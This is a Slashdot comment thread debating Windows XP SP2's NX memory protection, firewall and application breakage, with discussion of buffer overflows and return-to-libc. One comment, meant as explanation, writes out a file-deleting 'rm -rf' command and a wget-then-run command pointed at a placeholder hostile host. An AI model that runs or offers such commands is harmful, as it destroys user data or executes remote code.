Windows XP SP2 Could Break Some Applications

Denver_80203 writes "An article from InfoWorld states that the upcoming Windows XP Service Pack 2 could break some 'unsecure applications.' In a quote from Tony Goodhew, a product manager in Microsoft's developer group says 'It doesn't really matter how long it is going to take you to do the work; security is an important issue and developers need to start doing that work now.' Or: 'The great bulk of applications will not be affected by memory protection. The number one that leaps to mind is execution environments with just-in-time code generation. The .Net Framework is one.' Fortunately for us, they are offering a course to guide the unsecure masses."

Uh oh

[Bishop,+Martin]

"the upcoming Windows XP Service Pack 2 could break some 'unsecure applications.'"

That's just about every application in Windows XP

Re:Uh oh

[pergamon]

No, that is Windows XP

Re:Uh oh

[Froug]

You don't realize how true this is after the W2K source leak. Microsoft has to take drastic measures if they are to stem the flood of exploits.

Making sure nothing can buffer overrun to execute with even user privileges is a neccessity now that countless local holes are known (Overflow on loading a bitmap? How in the hell did they manage to screw that up?).

Re:Uh oh

[FuzzyBad-Mofo]

From the developer's guide. Emphasis mine.

The security technologies included with Service Pack 2 will allow for better protection against network-based attacks.. Windows Firewall is now turned on by default and all ports are closed except when they are in use.

I hope their firewall doesn't open ports automatically, or it's nothing more than swiss cheese.

Re:Uh oh

[julesh]

Are you kidding? You have seen the format of a bitmap, haven't you? It's a seriously screwed up format.

I believe, BTW, the problem is an integer overflow one; a length field has a number substracted from it without previously checking that it is large enough to not wrap around to 2^32-(a little bit). This kind of thing happens a lot, and was the cause of the most recent Apache hole (among many others), so criticising MS for having one similar is a little harsh.

Re:Uh oh

NX will prevent that but 2000 wont get NX in any Service packs, so MS can blow me.

Re:Uh oh

[Nimloth]

The upcoming Windows XP Service Pack 2 could break some 'unsecure applications'.

Are we talking about Windows XP SP1?

Re:Uh oh

[DrSkwid]

hehe

I also like :

Work continues with microprocessor vendors to help Windows support hardware-enforced "no execute" (NX) on microprocessors that support the feature. This feature allows the CPU to enforce the separation of application code and data, preventing a component from executing program code that a worm or virus inserted into a portion of memory marked for data only.

So now MS and 3rd party programmers will think to themselves "aw well, if my pointer arithmetic is poor the CPU will catch any over runs".

Apparently MS hasn't learned the ancient ninja technique of heap redirection or return-to-lib.

So new hardware security features will lead to *more* exploits!

Re:Uh oh

Yes I bet Microsoft never thought of that. You better get in touch with them, ASAP.

Re:Uh oh

I hope their firewall doesn't open ports automatically, or it's nothing more than swiss cheese.

Yeah, Hope more...
That's UPNP - universal plug'n pray - technology developed by m$ which enables userland applications (e.g. MSN messenger) automatically open/close ports and change UPNP compliant firewall rules.

Re:Uh oh

SUBTRACTED subtracted SUBTRACTED subtracted SUBTRACTED SUBTRACTED... Got it? Thanks.

Re:Uh oh

[spideyct]

If you keep reading, you see that they mean the application must support a stateful firewall.
Ports will not accept incoming messages, unless an application has opened the port with an outgoing message (putting the port "in use").
This means that server applications - which have to accept uninitiated communications - have to be put on a "whitelist" manually.

It will not protect you against trojan horse applications which can initiate communications from your machine, but it will protect you against external port attacks which have helped some of the famous worms propogate.

Re:Uh oh

[Froug]

I've seen the format. I've seen worse, and bmp is hardly bad enough to mess up an implimentation for.

I don't feel it's harsh at all to criticise over this. The Apache Group should also be embarassed for the same.
(what, you assumed I'm yet another anti-MS/pro-OSS zealot?)

Integer overflows are easily avoided, and the very fact that they crop up so often is the reason programmers keep such a sharp eye out for them (at least where I work, anyway).

Re:Uh oh

[js3]

it's not the format it's the code to read the format that was buggy.

Re:Uh oh

Microsoft has to take drastic measures if they are to stem the flood of exploits.

Flood? Where is this flood that you speak of? The source code has been out for a few weeks now and all we've seen is one problem. Surely by now we'd have seen this flood. Or do you think, perhaps, that you're embellishing a little?

Re:Uh oh

This is Windows. Release schedules are lazier, even with the worm writers. Besides, how do you know the one you've seen is the only one?

Re:Uh oh

[lowe0]

Nope. If the NX flag catches your problem, it won't let it slide - it'll refuse to run that segment of code. So instead of a buffer overflow you can't see, now you'll have an exception that's a lot more visible, and a lot less dangerous if it slips by QA.

Re:Uh oh

Oh, you just gotta have it right now don't you? It's a lot of code for the skr1ptk11d13z to sift thru.

Re:Uh oh

That's some nice astroturfing.

It could have made a good troll if you'd only jazzed it up a little.

Re:Uh oh

(what, you assumed I'm yet another anti-MS/pro-OSS zealot?)

No. With a 6-digit uid that starts with 7, I'd assume you are a MS fanboy.

Re:Uh oh

[HiThere]

This is one of the big problems with C & C++. Several languages either catch these, or can catch them if the debug flag is set. But they need to know what's a pointer, so no integer casts are allowed.
Examples of languages that can handle this particular problem include Eiffel, Ada, and D. (Actually, as D is still in beta, I shouldn't have mentioned it. But it's my current favorite. Digital Mars D.)
Eiffel is another good choice, but many implementations are a bit slow. And Ada is complex compared to C (though not compared to C++) , but it has many other nice features...as well as a few clunky ones.

I'm sure that there are many other languages that can handle this problem, but those are the only one's that I know that are also suitable for systems programming (*two* constraints).

Re:Uh oh

Psst... Bitching about UIDs doesn't work when you post AC.

Conveniently, bitching about ACs bitching about UIDs while AC does. ^_^

Re:Uh oh

[dildog]

I think you missed the point. This is fundamentally similar to 'stackguard' and has been circumvented for some time using the following technique: (and others, mind you)

When you overwrite the stack pointer, you don't have to point to code that's on the stack.

For example, I can overflow with a 'command-line string' on the stack, and have the overwritten stack pointer point to the address of a library function, such as 'system()', or something, and then it won't be executing any code from the stack, just taking arguments from the stack like usual.

This can't be blocked with a conventional non-executable stack.

Re:Uh oh

It's not a language problem, it's an issue with compiler implementation and CPU design. Stack overflows, heap overflows, integer overflows, etc allow execution of code because of the way the machine code runs and the architecture of the CPU. It can be fixed without changing the language or using some obscure language.

Re:Uh oh

[dildog]

Actually, it's not like stackguard. It's like a non-executable stack. Stackguard uses canaries, much like the VC7 'buffer-overflow protection' compiler switch. Sorry for the confusion. The rest of the message is true :P

Noon is early for me :P

Re:Uh oh

[pavon]

So now MS and 3rd party programmers will think to themselves "aw well, if my pointer arithmetic is poor the CPU will catch any over runs".

Give me a break. You might as well say that we should get rid of memory protection and preemptive multitasking, because having them makes the programmers lazy, thinking the OS will catch their errors.

The NX feature is very good for security and stability. All people including programmers make mistakes, and if you design your security policy on the basis that no one will ever make a mistake you are bound for trouble. The only sensible approach is to have multiple layers where mistakes in one will be caught in the next and prevented from becoming a bigger problem than it should.

If the OS+hardware completely disallow you from writing to code memory, or executing application memory, then any attempts to do so will be killed on the spot and the blame will be placed squarely on your application. The user will know that your program screwed up (or was being malicious) instead of blaming it on windows. So not only will this close off an entire class of exploits, it will provide incentive for programmers to do a better job!

Re:Uh oh

Froug (710553):

is the reason programmers keep such a sharp eye out for them (at least where I work, anyway).


Hehe... Grade school isn't work, boy.

Re:Uh oh

[dnoyeb]

Its why I favor java so strongly. Yet this seems to be one of the targets of the "patch." I hope this does not signal a return to the days where MS intentionally broke applications but never let on about it.

This seems to be exactly why the government was suing them. They will support .NET making the adaption internally, but java is on its own. That is unfair use of monopoly power.

Re:Uh oh

"The NX feature is very good for security and stability."

NO NO NO! That's the kind of thinking that will result in a 'golden age' of exploitable software. NX does not close the vulnerability left by a buffer overflow. All it does is require you to use a different class of attack.

Overwrite the stack pointer with the address of a suitable library function. E.g., clobbering the stack pointer with the address of system() and overwriting the top of the stack with (pointer(s) to) suitable arguments (e.g., "rm -rf ~/", or "wget -c http://somebadplace.com/somethingbad.sh;/bin/sh somethinbad.sh"). Nothing on the stack ever gets executed, and you neatly sidestep any protection afforded by NX.

Re:Uh oh

[HFXPro]

Java woudln't really help other then when if I managed to access and index out of bounds. Java's ints are still size defined and do wrap around. Even worse, it has no unsigned types. If you are talking about an os you will often need unsigned types.

Java maybe nice, and I often program in it for school, work, or fun; however, it is not the greatest language out there. In fact it is missing many of the things I often desire when programming an application (Unsigned types, enumeration, operator overloading, Generics... Okay so they fixed some of them). However, Java is a everything has to be an object language which I find makes me feel like I am programming in a strait jacket. So usually I use C++ or Objective Caml (both of which I also find fault in). I would also use Lisp but haven't had time to learn enough of it.

Re:Uh oh

[drinkypoo]

Well you're closer, but you're not right either. You will be able to open ports to those applications. So it will break them, but fixing them is as simple as opening some ports. The clueless home user will have to wait for a new revision, but everyone else should have no problems.

Anyway a stateful firewall isn't where the application opens the port with an outgoing message. A stateful firewall is where the firewall code keeps track of packets, determining if they are part of an ongoing communication (read: TCP stream, though you can fake statefulness in UDP in some instances) so that each packet does not have to traverse the rules list and be tested against each rule until one matches.

Re:Uh oh

Was that supposed to be a troll? How cute.

Re:Uh oh

[HiThere]

There are add-on utilities that can be coerced into working with C or C++, but the issue is that you don't really know the type of the data that you are working with. Languages that require the frequent use of casts, and which mean "think of this data in a different way" rather than, e.g., change this integer to a float, are fundamentally insecure unless there is hardware backup, or some other wrapper which emulates that effect.

C is such a language. C++ is such a language. In C and C++, type is merely a label of convience, and is subject to being overridden at whim. (Consider all the code that depends on untyped data stored in arrays of size zero. Possibly C99 has fixed this problem, as I haven't checked. But I really doubt it, because it would break too much old code. Possibly recent versions of C++ have fixed this, but I haven't heard the screams of anguish that would arise, so I doubt it.

However, if you want a popular language without this problem, you could pick Java. Now that gcj is available it's a compileable language. I don't think of it as suitable for systems programming, so I didn't mention it, but it avoids the problems. (At much greater cost in effort than the other languages that I mentioned, but it does avoid the problems.)

Now I will admit that my personal preference has been Python, or perhaps Ruby. It varies. But I don't think of them as suitable for system programming. And Smalltalk also doesn't suffer from the problem.

That you can avoid the problem by wrapping C in barbed wire (effectively), or possibly a spacesuit, doesn't mean that it isn't a language related issue.

Sorry, I don't remember the names of the utilities that will handle the problem for C, but the last time I checked they weren't cheap. And I was, so I adopted a less expensive solution. And I haven't regretted it. Once you are away from C for awhile, you start to really understand how many bad features it contains. There are good historical reasons for each of them. And C++ kept them all, for compatibility. And because of compatibility, C can never fix them. It would break too much. But at some point, the only sane decision is "ENOUGH!", and you start writing code in a better language. (I suspect that D should be that language, but there are many contenders. And most of them are significantly better than C given today's computers. Also given just how complex C++ has grown in the attempts to solve it's intractable basic problems.)

Re:Uh oh

[innocent_white_lamb]

That's the kind of thinking that will result in a 'golden age' of exploitable software. NX does not close the vulnerability left by a buffer overflow. All it does is require you to use a different class of attack.

So just because a burglar can break the window means that we shouldn't bother to lock the car door?

Re:Uh oh

[Joke+Police]

OMG the parent post made fun of insecure windows apps and it was funny so I will be funny now by making fun of Windows ITSELF! HURR! Cause you know windows hasn't progressed since Windows 98. Isn't it funny? Guys?

Re:Uh oh

[lyphorm]

So just because a burglar can break the window means that we shouldn't bother to lock the car door?

More like: Just because the alarm is enabled you can stop worrying over whether or not you locked the door.

It's nice having something like this to catch errors, but it could also lead to developers using it as a crutch and not bothering to make their code secure. In other words, it looks good on paper, but it's only marginally effective in practice and still doesn't fix the problem of poorly written code.

Re:Uh oh

[Joke+Police]

Shit! The article was talking about Windows XP SP2 breaking some "unsecure" applications! I need to suck the dick of the slashdot masses so I will make a joke to appeal to their base instincts. Oh, I know! I'll make a windows = insecure joke! Cause, you know, no one's ever made one like that before! I am teh funnay!

Re:Uh oh

[timmy0tool]

A new BSOD?

Re:Uh oh

[Guppy06]

So the service pack will corrupt the Windows install? It's nice to see Microsoft hasn't changed a bit...

Re:Uh oh

Besides, how do you know the one you've seen is the only one?

I don't. But then I'm not the one making a claim that it is the only one.

The OP mentioned the "flood" of vulnerabilities. I haven't seen anything more than this one. With the way people are talking you'd have thought that they'd have found more than *ONE* by now.

Re:Uh oh

[gareth6889]

I was thinking the same thing :)

Re:Uh oh

You have seen the format of a bitmap, haven't you? It's a seriously screwed up format.

What I find amusing is that the BMP format is using RLE compression, but stores the RGB values of a pixel consecutively and applies the RLE compression only after that. In other words, the RLE compression will only ever kick in when the bitmap contains consecutive gray pixels. That's not only screwed up, it's sick.

Happens to explain why BMP files tend to be nearly as large as uncompressed raw images even though they are usually "compressed".

Re:Uh oh

Yeah, but at least you have a large bed of money to keep you warm at night.

Go back and suck on Bill's teat some more, Microserf.

Re:Uh oh

[Enahs]

Windows may have progressed, but clients like Outlook Express haven't.

Or haven't you been paying attention?

Re:Uh oh

[johnharding]

For what I can gather, only AMD K8 and Intel Itanium processors have the NX support, so unless MS can bully Intel/AMD into building this support into existing designs for their older processors, this new support isnt going to kill everything to most people. Well not instantly. This is the problem as MS doesnt control hardware, where as other OS vendors also control hardware - HPUX for example. Therefore Stack Overflow Protection is built in as standard.

Re:Uh oh

[Spy+Hunter]

Which processors support NX? Does Linux support NX on these processors?

Re:Uh oh

[DrSkwid]

Good point, and one I had considered myself.

If all new software is written with 'aw well, NX will catch it' then that's another stick to beat the non-upgraders with.

Up here in the non-Windows world, where hardware upgrades for every point release are not an issue, programmers prefer to put their faith in the libraries.

string(2): avoiding buffer overruns in upas since 1984

The weak point then, is users have to hope that the programmers read the manual!

Re:Uh oh

You don't realize how true this is after the W2K source leak. ... buffer overrun to execute with even user privileges is a neccessity now that countless local holes are known

And how do you think that buffer overruns were found and exploited before the source code was leaked? This is one of my biggest complaints about Microsoft. These vulnerabilties are easy to code automated tests for, at least on network ports where (arguably) they have done the most damage, and there was simply no excuse for releasing 2k3 server or XP with the Blaster vulnerability.

Overflow on loading a bitmap? How in the hell did they manage to screw that up?

Now, this is something that having the source code would help find. I'm not sure that I would have thought of testing this particular hole. However, when this exploit was first made public, someone posted here at slashdot mentioning that they found and reported this looong before the source code was leaked. He found it during normal testing of a bitmap generation program that fouled up the format in the right way to expose this.

Re:Uh oh

Why do people automatically trust Microsoft when they say they are going to secure their apps and OS? Look at their track record. Even after Trustworthy Computing, they still manage to implement buggy insecure code. What seems like a good idea will only provide you with a false sense of security as MS can't implement them without introducing new security holes. You can argue the merit of a method, but I am willing to give Microsoft a benefit of a doubt that they will sucessfully incorporate a buffer overflow somewhere. Give the devil his due.

Fool me once, shame on me. Fool me twice, shame on MS (and I am an idiot for being fooled twice).

Re:Uh oh

[zero_offset]

That would be interesting if it was true -- but it isn't. RLE is not a good compression choice unless you're using highly artificial images with large sections of uniform color (usually at 8 bits), but it certainly isn't dependent upon or only effective with "consecutive gray pixels".

For example, this GIF image (artibrarily chosen from a Google search) contains a bunch of colors and almost no gray. When saved as an uncompressed BMP, the file is 76K. When RLE is turned on, the image is only 14K.

RLE isn't going to do you much good with a "real" image -- a photo, or anti-aliased rendering, or something along those lines -- but that's a failing of RLE itself (or more accurately, a failing of the person who chooses to apply RLE to that kind of image).

Re:Uh oh

[Guppy06]

OK, whoever modded me as flamebait obviously wasn't around for the Bad Old Days when it was called Windows NT. Is there anybody who used NT 4.0 or earlier and didn't have to reformat the hard drive at least once after a service pack install?

And of course after you finished reinstalling the OS, you then had to start over with SP1 again and work your way back up...

Re:Uh oh

[Slider451]

Is there anybody who used NT 4.0 or earlier and didn't have to reformat the hard drive at least once after a service pack install?

A lot of large companies still use, and swear by, NT 4.0. IT shops who know what they're doing have good luck with it.

And of course after you finished reinstalling the OS, you then had to start over with SP1 again and work your way back up...

You do know that Windows Service Packs are cumulative, right?

Re:Uh oh

[sylvandb]

RLE isn't going to do you much good with a "real" image -- a photo, or anti-aliased rendering, or something along those lines -- but that's a failing of RLE itself

RLE works just fine for those types of images if you apply it to each color plane individually. (Taken alone, each plane is "gray".)

sdb

Re:Uh oh

[zero_offset]

Sure, but not in a BMP. (I think the word you're looking for is monochrome.)

Great!

[Lumpy]

another reason for the company I work for to NOT migrate from Windows 2000.

Thank you Microsoft!

Re:Great!

[wasabii]

Yeah. When the open source guys break insecure applicications at least they get fixed in minutes, or it just takes a recompile. :0

How are you suppose to correct these apps? I bet some don't even have company's behind them anymore.

Re:Great!

[mcx101]

It's hardly new for Windows to drop backwards compatibility in areas. Many applications which are partly 16-bit and partly 32-bit won't run on Windows XP, but do run on Windows 95/98/ME for example

Windows XP has application compatibility features which allow you to set the OS version to previous releases and provide compatibility with older registry layouts, for example. That kind of compatibility feature is unlikely to help with stricter security controls of course (unlesss there's an option simply to turn off the new security features).

Re:Great!

[malchus842]

I've run into this many times. Or if the company exists, they have dropped support for the older version. And many times, the newer versions are not providing anything useful *except* support for the new OS. Not worth the upgrade price.

With open source, I can nearly always manage the problem - recompile works most of the time, and if not, I can either fix it myself, or find someone who has or will fix it, either for free or for a reasonable fee. More and more of my clients are starting to see the value of Linux and open source applications, especially in the server area. And these are small to medium sized businesses who tend to be very conservative about how they spend their computing money.

I even have customers asking about switching to Mac - something that hasn't happened in ages, if ever!

Re:Great!

[LousyPhreak]

"How are you suppose to correct these apps? I bet some don't even have company's behind them anymore."

simple:
Manager: oh no application x doesnt work anymore what do we do now?
Microsoft: hey look we have just the right software for you! you just need to sign this eula, register online, live with the fact of 'a few' security holes, high cost, .....

or what did you think of?

Re:Great!

[korgull]

Well, those companies that have chosen to use MS in the past should already have that risk evaluated. They either have put money aside to get things repaired or have money aside to migrate to another platform.
Either case, if they didn't see that risk they should probably fire the IT staff because it was somehow their choice to go with MS.

Re:Great!

[TobiasSodergren]

_I_, on the other hand, think it is great that Microsoft finally focus on security, as long as the developers still can use their ordinary development tools to conform with the security guidelines/policy.

Re:Great!

If you dont migrate FROM windows 2000 you will NEVER get NX (No eXecute CPU flags) in any future SP from them. They have admitted this (Ask Mike Howard who works from MS) he says only XP will have No eXecute (NX) technology to mitigate buffer overruns.

This is a serious failure on his part and ignorance and also giving saying that 2000 is no longer fully supported yet its in a support life cycle.

I seriously treat his committment to 2000 support as bullshit based on his lack of forsight. "000 code is leaked and he refuses to mitigate the risk by NX in the next SP.

Re:Great!

The plural of company is companies.

Re:Great!

another reason for the company I work for to NOT migrate from Windows 2000.

Damned if they do, damned if they don't. Make up your minds. Pick a path and stick with it.

Re:Great!

[darkain]

1) the 9X series of windows was able to run half-half-23-bit programs easier, because the OS WAS hanf-n-half. ever remember those "most switching benchmarks"? that was a benchmark to see how well your CPU could switch between the 16-bit and 32-bit instruction sets. 2) windows 2000 also supported the whole "application compatibility mode". go look for (i THINK its) appcompat.exe on the windows 2000 CD. it was an application w/ command lind params instead of being in the application's EXE's property menu. 3) as for compatibility w/ 16-bit applications, windows xp simply uses an emulator for 16-bit instructions. this is to make sure the memory arcetecture and other things dont break new pure-32-bit applications.

Re:Great!

[js3]

That's funny because it is these same companies that get owned when the exploits come out. Many companies don't patch, either through ignorance or fear. Take MDAC for example, very buggy and MS has a patch to upgrade to the latest version but I've run into companies that require a certain version of MDAC. "We specifically need this version to run. your app uses that newer version with all the great features but we certainly don't want that. we want to old one with lots of securit holes in it"

Re:Great!

[sketerpot]

Let me get this straight: Microsoft is making XP more secure in a way that could break some programs (sort of like the grsecurity linux kernel patches break some programs), and you're against that? Sure, it would be nice if it was optional---but it's Microsoft! Doing something about security! Even if it means actually announcing that some programs may be broken!

Re:Great!

Oh please. Windows 95/98 are 8 and 5 years old. You seriously expect all the applications from back then to work flawlessly without a *single* modification to the code on the new OS's?

Gimme a break. You know damn well open source applications are updated when new releases of redhat, suse, etc are out. Why is it Microsoft's fault the closed source companies aren't providing patches for the new OS's? Think a little here.

Re:Great!

[ivan1011001]

There's no reason not to migrate from Windows 2000. Just don't migrate to Windows XP. You could always switch to Linux, BSD, or any operating system. Of course, now that Windows 2000 is open source, you really don't need to.

Re:Great!

You don't know what you're talking about.

Re:Great!

[fwarren]

Sure

In the OpenSource world, if something is broke by an upgrade, you have the source available and someone, someplace (paid or unpaid), can fix it, so you can compile it yourself.

PITA? Sure, but it is possilbe.

On the other hand, most software in the windows environment, is closed source, and if you relay on an app made by a company that went out of business, your are out of luck. If you don't want to pay for a bunch of upgrades, your out of luck. If the new version dropped some feature you rely upon, or forces you to rewrite hundreds of scripts, your out of luck.

So with open source, there is the potential that can compensate for software you run being made incompatible.

With Windows, hearing just hearing that some things may become incompatible means you know that if program (x) is borked, you have no way to continue running it, because it is possible you will have no access to source, or vendor you can fix it.

Re:Great!

[Krunch]

That is not really a Windows problem. There is a lot of Free/Open Source programs running on Windows. The problem is about using closed source software. The same problem could happen in the *nix world too. But it's probably true that most Linux users use Open Source software and Windows users use closed source ones.

Re:Great!

[drinkypoo]

Half-23-bit? I've never seen a 11.5 bit architecture. :) BTW, JIC you didn't already know the reason Windows ME sucked is that they stopped it from going to real mode. Complete loss of backwards compatibility ensued.

Re:Great!

[darkain]

woopsies... i ment to type in "half-16-half-32"... not sure what all happened there... as far as i know tho, WinME was still dual-mode. and for those that dont know this, but that dual-mode operating system is what caused most of the instabilities in the windows 9x series. this is why winnt4 was always more stable, whereas 9x shat itself all the time. everyone complains about microsoft's lack of backwards compatibility, but, what they dont realize is that microsoft layed down a structured frame work for designing applications for windows 95.... anything that followed that structure works just fine in any version of windows from 95 and nt4 all the way up to XP and the longhorn alphas. somewhere the line has to be drawn on backwards compatibility tho, to allow for new functionality. dropping support for nearly 10 year old programs in favour of new technology? i will go along with that.

Re:Great!

[drinkypoo]

Real Mode support was still in the OS, but turned off. See Real DOS-Mode Patch for Windows Millennium By Reines [MFD] (that's for dos booting), and Overview of Real Mode Removal from Windows Millennium Edition. Apparently Windows ME also used a VM to run DOS programs. (See second link.) Incidentally in my experience NT 3.51 was more reliable (on appropriate hardware - it did get left behind) than NT 4.0 because they merged two of the memory spaces in it in order to improve speed. Windows 2000, of course, is one of the best Windows(tm) OSes yet, and IMO Windows XP is just as good (there's some new bloat, but you can shut it off, and lose only disk space)

Re:Great!

[Lumpy]

no I'm not against it, the morons in the corperate IT /NOC only JUST authorized the patches for most of the older exploits.

they will disconnect any machine from the domains if they find any SP4 patches or anything patched higer than their "blessed" levels.

I'm just pointing out that most of corperate IT is full of incompetent boobs that take these announcements as another reason to not apply patches.

the patches havent been "tested" and they have been testing SP4 for w2K for over 8 months now with no idea of when it will be approved.

Re:Great!

Well, since this is Windows, you could always replace program (x) with program (y) which has roughly if not exactly the same functionality.

Yes, it'll probably cost cash, but that's why you spent $$$ on Microsoft in the first place.

Re:Great!

[G-funk]

ever remember those "most switching benchmarks"? that was a benchmark to see how well your CPU could switch between the 16-bit and 32-bit instruction sets.

Huh? There aren't two instruction sets in x86, only real mode (and v86) and protected mode, and all windows programs since 3.0 are protected mode programs. The only difference apart from the "segment" sizes is the default register size. In one mode, the code for "mov ax,3" updates the lower 16 bits only, in another mode it will update eax, and it's simply a bit in the cs shadow (iirc), and doesn't take any longer to load one with the 32bit flag than one with the 16 bit flag, and you definitely need to reload cs every task switch regardless.

not surprised by /.

so, /. picks on microsoft for trying to fix the problems....

yawn, the anti MS bias here is soooo 1990's. You asshole operating system zealots need to grow up.

Re:not surprised by /.

[mangu]

the anti MS bias here is soooo 1990's

No, it's soooo 2004. Anti-MS/pro-Linux bias was restricted to very small groups of hackers in the 1990's, but it's progressively growing into the collective conscience, as more and more security failures in MS software get more and more people pissed-off.

Re:not surprised by /.

Sure, if by "collective conscience" you mean an increase of 2% marketshare.

Re:not surprised by /.

[Perky_Goth]

of course, for a lot of us it has to do with how much they screwed us up already.

Re:not surprised by /.

[pclminion]

*Looks around*

I don't see any particularly vehement criticisms of this move by Microsoft.

Perhaps you should pull your head out of your ass and look around instead of assuming things incorrectly?

Re:not surprised by /.

[globalar]

It's not just the security per-se. All code has security flaws somewhere - we can live with this. But MS has some special sins, which they will not confess or provide restitution for:

1) There are some obvious security problems with the OS and some applications. Obvious like allowing MSHTML in Outlook. Allowing MSHTML in anything with admin priveleges is bad.

2) Windows in a default installation leaves thing waiting to be maliciously altered. Most users don't need admin priveleges, so why give them to everyone? There are other examples (like no default passwords on user accounts - admin accounts).

3) MS doesn't like fixing things. They seem to avoid it. IE is the classic example. MS has the largest installed browser base, and IE is one of the worst browsers. They are just screwing their customers there. MS: Just buy out Opera and use that, please.

4) Windows and most (if not?) everything MS owned is closed source. So not only does /. not like it, but geeks can't have their special way with their computer. There are huge benefits to open source of course, besides our curiousity and fetish for improvement.

5) MS doesn't patch security concerns or general bugs, and then goes around and tells people they have extremely fast return on necessary patchs and that their focus is on security. Well nobody really believes that, so MS is talking to itself and paying people to say it back to them.

6) MS is a big, rich corporation who has tried to take over a few industries at least.

Re:not surprised by /.

[fwarren]

Go tell that to the people of Brazil where they are starting to catch on to what running Microsoft software really means.

Re:not surprised by /.

[AnyoneEB]

MS: Just buy out Opera and use that, please.

You're kidding, right? Opera certainly has a great interface and nice browsing features, but it's HTML/CSS support is even worse than IE from what I've seen (note that I have an older 7.x version).

Java?

[0tim0]

The great bulk of applications will not be affected by memory protection. The number one that leaps to mind is execution environments with just-in-time code generation.

Is this supposed to mean that Java will stop working?

--t

Re:Java?

[WeeBull]

Just in time code generation != just in time compilation

Re:Java?

[LousyPhreak]

no microsoft would never do this, they would be sued for doing so, you know anticompetitive business tactics and the like...

but wait... there was something...

Re:Java?

[julesh]

Err... would you care to enlighten me on the difference in a way that suggests java doesn't do JIT code generation?

Re:Java?

Funny that this got a "Score 3, Informative".

Because the Java JIT does what?
Oh yeah, its generating native code on the fly.

Conclusion:
Java wont work anymore and MS will be happy.

Re:Java?

[0tim0]

Just in time code generation != just in time compilation

Uh, well I don't know what source code generation has to do with protected memory. So I assumed they meant binary code generation which is one phase of JIT.

--t

Re:Java?

[smallpaul]

How do you think you do compilation without code generation? Compilation is the conversion of code in one format (in this case Java bytecodes) to code in another (e.g. x86 assembly).

Re:Java?

[HiThere]

Well, if they're going to break .NET, one assumes that they have a major target in mind...and I'm not talking about the one they mention in their PR justifications.

Re:Java?

[DotNetGuru]

If Java is doing the right thing it will not be broken.

The right thing to do is to call VirtualProtect(addr, size, PAGE_EXECUTE_READWRITE, &prevProtect);

That will mark the memory pages as being read/write/execute (where as previously they were only read/write). People should have been doing this before anyway (as the pages were never guaranteed to be executable), and if they didn't it's their bug.

I'm betting that Sun can download the beta and test Java on XP SP2 to make sure they're compliant though. Hell, Microsoft could probably even do some compatibility testing for them and enable a compatibility layer for Java. But then again Sun might sue them for that. MS probably just wants to stay away :).

Re:Java?

[The+Vulture]

I think what they're referring to is self-modifying assembly code - the code rewrites itself as it runs for one purpose or another.

I haven't done any 80x86 assembly language since my second year of university, but back on the Commodore 64, if I was doing something and needed a lot of counters, it was easy to run out of registers. So, sometimes I'd just re-write the value of a compare statement, or a branch instruction to get the code to do something different, so that I didn't have to push a whole bunch of registers to the stack and stuff like that.

Today though, there's probably code (like copy-protection code) that decrypts itself before/while running, or maybe even decompresses itself before/while running. The CPU/Windows XP SP2 is likely to prevent this from working, because you're trying to modify the program segment (which on newer CPUs, I thought, was meant to be non-modifiable - that's what the data segment is for).

-- Joe

Re:Java?

[Krunch]

Does it has anything to do with OpenbBSD's W^X ?

Re:Java?

[pod]

No, what they are referring to is code that generates other code, like in a VM that does JIT compilation and optimization. Normally, you would make the memory where the JIT generated code resides as executable, but if your app does not do that it will be broken after the patch.

Re:Java?

[tonywestonuk]

The way I see it, is that buffer overflow exploits work when a buffer is defined too small for the amount of data used to fill it. The data 'overflows' into a region of memory that contains program code, the processor is currently executing. By definition, this region of memory will be already marked as executable by 'VirtualProtect'. So, whatever overwrites the code can still be executed..... Maybe a better idea would be to protect memory so that it is read only?

Re:Java?

[VertigoAce]

Buffer overflows don't overflow into program code (the stack grows toward program code, so a buffer goes away from program code). The simplest buffer overflow would put code onto the stack and overwrite the return address of a function with an address of the code on the stack. This only works if the stack is executable. It sounds like they'll be making the stack for data only, breaking some applications. This does not stop another kind of overflow where you put system call arguments on the stack and alter the return address to start executing a system/library call.

Re:Java?

[zenyu]

The way I see it, is that buffer overflow exploits work when a buffer is defined too small for the amount of data used to fill it.
yes.

The data 'overflows' into a region of memory that contains program code, the processor is currently executing.
No, usually not. What you usually do is write past a buffer on the stack, until you reach the function's return pointer, then you overwrite that with the location
of your own code. You can place this code either before or after the new return pointer, but the catch is that the stack must be marked as executable for you to run this code. Usually it is not possible to write into a region that contains program code with an overflow, those pages are in read-only pages/segments. (I'm assuming the text segments are read-only in XP, I may be wrong.)

In order to exploit a buffer overflow when the stack is in a non-executable page/segment you must find the code you need within the existing program or in the operating system, or in some other place marked executable. This can be much harder than just sticking your own code in there. However, if you just want to do a denial of service a non-executable stack is not a problem. Also a clever hacker can find those bits of useful code within a static binary or in the OS, or even within the normal course of execution by just stuffing the wrong data on to the stack. So compiling your own executables and operating system with random offsets is still a good idea, and it's an even better idea to fix the buffer overflows in the first place.

Still this is a very good idea, it's way too easy to exploit buffer overflows with an executable stack. It makes cracking just a cookie cutter operation. 1. find any overflow. 2. select one of many prewritten rootkit startups 3. profit. With page/segment protection it becomes 1. find an overflow. 2. ???? 3. profit.

JIT can still work, you just memmap/malloc the buffers for the code and then mark them as executable, instead of allocating little bits of code on the stack. This is probably already done this way in Java JIT engines, they might need to do a cleanup to make sure all the pages are allocated and marked properly.

Re:Java?

[BoneFlower]

Theoretically... Also, .NET is going to be slammed by this apparently. They are actually partially breaking some of their own technology that they've been trying to base everything on.

Re:Java?

[jarich]

Anyone old enough to remember this saying... "DOS isn't done until Lotus won't run" Oh yeah, this won't affect Java, the best cross platform server side application language out there.

Re:Java?

[Old+Wolf]

WTF. So are you saying that all a virus writer has to do is make their first instruction 'VirtualProtect' and it will keep working like it did before? I mean what is the point of having a NX flag if you can circumvent it.

Re:Java?

[DotNetGuru]

That wouldn't work because the pages are already non-executable: Therefore they cannot execute code to change it to be executable.

You are correct that if they are capable of executing code then they can change arbitrary pages to be executable. But at that point they already own your machine: They're executing arbitrary code.

Re:Java?

Assembly? Really? I thought it converted it from (insert programming language here) to (insert processor opcodes here).

Assembler is certainly very close to the iron, but even assembly needs to be compiled.

Re:Java?

[Threni]

> How do you think you do compilation without code generation?

He said `just in time code compilation`, not `code compilation`.

Re:Java?

well, in this case, it's (insert virtual machine opcodes here) to (insert processor opcodes here).

Lets not bag on MS

When this same problem affects many Linux distributions. Some, like Xandros, will simply break if you install KDE 3.2, or upgrade the kernal to 2.6. - You'll have to wait for a full new stable release for these things to work.

I'm surprised MS would allow this, so it must really be a small minority of applications that will break.

But lets not bag on MS with general crap, this affects Linux too.

